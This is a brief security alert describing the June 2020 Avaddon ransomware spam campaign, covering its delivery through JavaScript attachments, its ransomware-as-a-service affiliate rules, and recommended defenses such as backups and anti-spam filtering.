Security Alerts

Avaddon Ransomware Launches a Massive Global Spam Campaign

On June 8, 2020, a new ransomware variant, dubbed “Avaddon,” was observed deploying a massive spam campaign which targeted users globally. The Phorpiex botnet has been identified distributing it via malicious emails that contain a JavaScript file that masquerades as a JPG image. Upon execution, the JavaScript attachment will launch a PowerShell and Bitsadmin command to download the Avaddon ransomware to the %Temp% folder. From there, the ransomware will start encrypting the victim’s computer and append the files with the “.avdn” extension. Once the encryption is done, Avaddon displays a ransom note that will direct a victim to a TOR payment site that contains instructions on how to pay for a decryptor.

According to an advertisement observed on an undisclosed Russian forum, the Avaddon operators claimed that they are a new Ransomware-as-a-Service (RaaS) program. Affiliates who join the program can distribute the ransomware through spam, compromised networks, and exploit kits; however, the affiliates must abide by a set of rules such as they cannot target victims in the Commonwealth of Independent States (CIS), including the Armenia, Azerbaijan, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Ukraine, and Uzbekistan. At the time of writing, it is unclear what the overall impact is of the Avaddon ransomware campaign.

It is recommended that users have a reliable and tested backup that can be restored, implement an anti-spam solution to stop phishing emails from reaching the network, and keep the operating systems up-to-date. The following indicators of compromise have been identified with Avaddon Ransomware:




Have you registered for our next event?